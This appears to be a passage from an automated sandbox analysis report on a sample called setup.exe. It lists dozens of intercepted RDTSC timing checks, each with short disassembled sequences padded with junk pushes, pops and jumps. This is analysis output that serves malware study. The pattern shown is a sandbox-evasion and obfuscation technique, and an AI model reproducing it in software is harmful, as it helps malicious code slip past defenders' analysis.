Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51561E second address: 51564B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361215h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F47CD36120Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E46 second address: 515E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E60 second address: 515E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47CD361218h 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 515E97 second address: 515EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F47CD34661Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F47CD346620h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51635A second address: 516365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47CD361206h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516365 second address: 516381 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F47CD34661Eh 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B40 second address: 516B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B5F second address: 516B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 516B63 second address: 516B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5151D2 second address: 5151E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47CD346620h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5151E8 second address: 5151EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51D830 second address: 51D834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DB98 second address: 51DBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBA1 second address: 51DBA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBA5 second address: 51DBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBAB second address: 51DBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51DBB1 second address: 51DBCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47CD36120Dh 0x00000008 jns 00007F47CD361206h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52107F second address: 521085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52A037 second address: 52A047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F47CD361206h 0x0000000a jng 00007F47CD361206h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 529E85 second address: 529E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F47CD346616h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 529E95 second address: 529EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F47CD36120Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D8EC second address: 52D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D453 second address: 52D457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D457 second address: 52D466 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D466 second address: 52D48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361218h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F47CD361206h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D48F second address: 52D495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 52D495 second address: 52D4B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361218h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5301A7 second address: 5301AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 530302 second address: 53030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F47CD361206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53030E second address: 530312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53744C second address: 537450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 537450 second address: 53745A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53745A second address: 53745E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53745E second address: 537462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 537462 second address: 53746E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F557 second address: 53F55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F55B second address: 53F565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F565 second address: 53F56F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47CD346616h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53F56F second address: 53F575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5455FB second address: 5455FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5455FF second address: 545609 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 545758 second address: 54575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 54575C second address: 54577F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD361206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F47CD36120Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561BC second address: 5561C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561C3 second address: 5561C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561C9 second address: 5561CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561CF second address: 5561EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F47CD361211h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5561EB second address: 55620A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346629h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55620A second address: 556210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 556210 second address: 556224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F47CD346616h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCC2 second address: 55DCCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F47CD361206h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCCE second address: 55DCD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DCD2 second address: 55DD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361212h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jg 00007F47CD361206h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F47CD361217h 0x0000001c ja 00007F47CD361206h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DD18 second address: 55DD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55DD1C second address: 55DD20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E273 second address: 55E284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jmp 00007F47CD34661Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E284 second address: 55E2A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361208h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F47CD361208h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F47CD361206h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55E2A1 second address: 55E2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5606CA second address: 5606D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5606D9 second address: 5606E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 558451 second address: 558457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 558457 second address: 55845B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 55845B second address: 558461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56F8DF second address: 56F903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346624h 0x00000009 jp 00007F47CD346616h 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA31 second address: 56FA3B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA3B second address: 56FA42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 56FA42 second address: 56FA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F47CD361206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57AEB7 second address: 57AEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E0D second address: 579E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E15 second address: 579E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E23 second address: 579E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47CD361212h 0x00000010 jmp 00007F47CD361210h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E50 second address: 579E56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579E56 second address: 579E69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F47CD361206h 0x00000009 jne 00007F47CD361206h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FA2 second address: 579FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47CD346616h 0x0000000a jmp 00007F47CD346629h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47CD346621h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FD8 second address: 579FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FDC second address: 579FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F47CD346618h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 579FEF second address: 579FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 js 00007F47CD361206h 0x0000000c pop ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A1A4 second address: 57A1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47CD346623h 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F47CD346616h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A5B9 second address: 57A5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A5BF second address: 57A5FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F47CD346616h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F47CD346621h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A767 second address: 57A794 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD36120Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F47CD361217h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A8E2 second address: 57A8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A8E8 second address: 57A90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361217h 0x00000009 popad 0x0000000a jl 00007F47CD36120Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57A90C second address: 57A91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jnp 00007F47CD346618h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F0D6 second address: 57F13F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F47CD36120Bh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F47CD361208h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx edx, dx 0x0000002e push 00000004h 0x00000030 mov dl, 75h 0x00000032 call 00007F47CD361209h 0x00000037 jne 00007F47CD361210h 0x0000003d push eax 0x0000003e pushad 0x0000003f pushad 0x00000040 push esi 0x00000041 pop esi 0x00000042 pushad 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007F47CD361206h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F381 second address: 57F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F47CD346621h 0x00000010 mov dword ptr [ebp+122D35F2h], ecx 0x00000016 push dword ptr [ebp+122D352Ah] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F47CD346618h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 jmp 00007F47CD34661Dh 0x0000003b push 250D8F82h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jmp 00007F47CD34661Eh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F3EF second address: 57F3F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F3F5 second address: 57F3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 580558 second address: 580566 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F47CD361206h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F0F second address: 581F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F19 second address: 581F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F1D second address: 581F2E instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD346616h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F2E second address: 581F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 581F36 second address: 581F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F47CD346616h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583EE9 second address: 583EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583EED second address: 583F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346624h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
